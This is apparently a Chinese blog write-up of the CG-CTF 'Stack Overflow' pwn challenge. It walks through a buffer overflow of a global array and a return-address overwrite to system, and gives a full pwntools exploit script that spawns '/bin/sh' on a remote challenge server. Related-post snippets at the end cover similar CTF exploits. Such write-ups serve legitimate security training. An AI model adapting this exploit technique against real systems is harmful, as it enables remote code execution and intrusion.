CG-CTF Stack Overflow

最新推荐文章于 2023-07-29 00:14:43 发布
最新推荐文章于 2023-07-29 00:14:43 发布
阅读量828 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43464124/article/details/90094595
版权

为了上800分也是够了…
题目地址:pwn
看了几篇wp,觉得写得总是差那么一丢丢意思
首先检查溢出点
在这里插入图片描述

通过双击A可以看到,A这个数组的大小为40
但其可以接受64个字符的大小
所以这是第一个溢出点
然后往下看
虽然明面上显示的是输入s是有限制的
限制为n
但是当我们双击n的时候会发现
n就在A的下面
因此我们可以通过A来溢出到n
在这里插入图片描述

在函数列表中我们可以看到有一个函数
名字叫做pwnme
这部明显是关键函数么
点开一看
果然
里面含有system函数
但是我们通过查找字符串发现
并没有/bin/sh字符串
因此我们需要自己去构造一个
因此我的exp为:

from pwn import *
p = remote("182.254.217.142","10001")
p.recvuntil("your choice:")
p.sendline("1")
p.recvuntil("you can leave some message here:")
payload1 = 'a'*40+'/bin/sh'
p.sendline(payload1)
p.recvuntil("your name please:")
payload2 = 'a'*0x34+p32(0x080483f0)+'a'*4+p32(0x0804a0a8)
p.sendline(payload2)
p.interactive()

前面几行就不解释了
从payload1开始
payload1 = ‘a’*40+’/bin/sh’
这是为了溢出A
使n的值为‘/bin/sh’
然后看payload2
payload2 = ‘a’*0x34+p32(0x080483f0)+‘a’*4+p32(0x0804a0a8)
由于输入的s到返回地址的距离为0x34(这个就不解释了)
然后就开始输入我们的指令了
首先
0x080483f0是system的地址
在这里插入图片描述
之后的 ’a’*4 是因为每个函数在call时,堆栈的栈顶是返回地址,所以这里随便用4个’a’充当返回地址,下一个参数为system的参数
我们知道下一个参数就是’/bin/sh’了
所以’/bin/sh’的地址就是n的地址了
IDA可以看到n的地址为0x0804a0a8
因此exp就构造完成了

Loggen~
关注
专栏目录
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 600
终于开始学pwn了…今天第一次做出来这题,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
CG-CTF SQL Injection
venu_s的博客
11-25 646
SQL Injection 题目 2.进入题目所给的场景,我们会看见如下图的内容 3.查看一下源码 <!-- #GOAL: login as admin,then get the flag; error_reporting(0); require 'db.inc.php'; function clean($str){ if(get_magic_quotes_gpc()){ $...
CG-CTF Stack Overflow(pwn)
苗_的博客
02-24 755
首先先拿到ida里面看一下,找一下溢出点 点进去A发现是一个大小为40的数组(0x28),但是可以接受64个字符,所以这里是第一个溢出点。 下面是对s进行输入,限制是n,点开n会发现n就在A的下面。 所以思路就是:我们可以通过溢出A来达到覆盖n的效果 然后我们点开pwnme函数会发现system函数,搜索字符串发现没有‘/bin/sh’,所以需要我们自己写入bss段。 exp: f...
NJUPT-CGCTF pwn2 StackOverflow [Writeup]
cossack9989的博客
12-30 2133
最近肥肠地想入门一下pwn,找了道题试了一下。 题目网址:StackOverflow 栈溢出啊。。虽然我水平很菜。。还是觉得挺有意思的 不扯了,先看题。 扔到32位IDA里面看看,观察一下,发现有两个很关键的函数message与pwnme,很显然message可以用来栈溢出,pwnme可以用来调用system函数,但是Alt+T之后并没有发现‘/bin/sh’,也没有提供libc.so,这
[BUUCTF-pwn]——[第六章 CTF之PWN章]stack
Y_peak的博客
03-12 744
[BUUCTF-pwn]——[第六章 CTF之PWN章]stack 题目地址: https://buuoj.cn/challenges#[%E7%AC%AC%E5%85%AD%E7%AB%A0%20CTF%E4%B9%8BPWN%E7%AB%A0]stack 思路 一个简单的栈溢出, 注意栈平衡就好 exploit from pwn import * p = remote('node3.buuoj.cn',25385) shell = 0x0000000000400537 ret = 0x0000000
wikictf-boverflow
测试
09-13 229
  wikictf上的一道题:链接:https://pan.baidu.com/s/183xQZQS7YwVFCoMhtX9dtg 密码:ep5s  可以看到文件时.dms结尾的文件,没见过,不过我们先用010editor分析一下他的结构:   是elf文件,是Linux下的可执行文件,Linux是不以后缀来区分文件类型的,所以到Ubuntu运行一下程序: ...
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 ...
CTF-misc工具2-CTF-Tools-masterV1.3.7
最新发布
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
buuoj [第六章 CTF之PWN章]stack
yongbaoii的博客
01-20 1069
ret2text 习惯性查一下保护,啥也不是。 很明显的栈溢出。 很明显的shellcode 直接十八个字节再加上返回地址就有了。 exp from pwn import* r = remote('node3.buuoj.cn',27516) #r = process('./stack') context.log_level = "debug" #gdb.attach(r) system_addr = 0x400537 payload = 'a' * 18 + p64(0x40054e) + p64(
171222 pwn-CGCTF(pwn150)
whklhhhh的博客
12-22 1672
1625-5 王子昂 总结《2017年12月22日》 【连续第448天总结】 A. CGCTF-cgpwna B. 简单的栈溢出,作为复习用的第一题233结果还是折腾了好久 基本概念不清啦很明显,message函数中存在栈溢出 A和n是全局变量,s是栈上的局部变量虽然s的长度受限,但是因为是全局变量所以可以通过A的溢出来修改n 它们在bss段,发现n紧接着A后面,A的长度是28字节,
CTF必备技能丨Linux Pwn入门教程——stack canary与绕过的思路
dfdhxb995397的博客
09-25 934
Linux Pwn入门教程系列分享如约而至,本套课程是作者依据i春秋Pwn入门课程中的技术分类,并结合近几年赛事中出现的题目和文章整理出一份相对完整的Linux Pwn教程。 教程仅针对i386/amd64下的Linux Pwn常见的Pwn手法,如栈,堆,整数溢出,格式化字符串,条件竞争等进行介绍,所有环境都会封装在Docker镜像当中,并提供调试用的教学程序,来自历年赛事的原题和带有...
18.9.16 PWN2----Stack Overflow
qq_42192672的博客
09-16 313
还是cgctf的题目 拖进IDA 来说一说fgets(..)函数 原型  char *  fgets(char * s, int n,FILE *stream); 参数: s: 字符型指针,指向存储读入数据的缓冲区的地址; n: 从流中读入n-1个字符; stream : 指向读取的流。 我们可以看到main中有两个函数,menu和message,(函数列表中还有pwnme函数,...
stack2 [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列15
重新启程
12-23 1389
题目地址:stack2 这是高手进阶区的第四题了,速度挺快啊,朋友!加油! 废话不说,看看题目先 没有什么特别的内容,那就看看保护机制 root@mypwn:/ctf/work/python/stack2# checksec fcca8ceb507544d1bd9c4a7925907a1d [*] '/ctf/work/python/stack2/fcca8ceb507544d1b...
CTF PWN-攻防世界Overflow整数溢出漏洞
道阻且长,行则将至。
07-29 1787
本文学习了缓冲区溢出漏洞常见的一种场景:整数溢出。一旦不认真考虑整数变量的范围,此类漏洞缺陷很容易在程序员的编码过程中发生,这也是安全工作人员需要注意审计的地方。
CTF|pwn栈溢出题目int_overflow解题思路及个人总结
skyattractive的博客
05-31 2341
CTF|pwn栈溢出题目int_overflow解题思路及个人总结 解题思路 拿到题目,标题是int_overflow 指可能是某个int型变量存在栈溢出,留意下 老规矩将题目拖到IDA放入ubuntu中查看相关信息 * stack/canary保护没开 ubuntu运行一下 简单的选择登陆 输入账号密码 返回结果 拖入IDA 反编译 查看main函数 进入login函数 login中定义两个变量buf和s,所给的栈的大小都很大,不存在栈溢出 我们继续进入check_passwd函数 这个函数只要
CTF-浅尝64位栈溢出PWN
热门推荐
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 2215
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
Hello-CTF
weixin_33682719的博客
03-02 696
题目: Hello-CTF: https://ctf.pediy.com/game-fi... 分析过程: 点击题目所给的exe文件: 大致理解题目的意思:找到对应的验证码。 将exe文件用IDA Pro(6.8)打开 shift+fn+f12打开字符串窗口: 点击,进入pass!所在的函数: 分别进入相关函数: 使用fn5...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值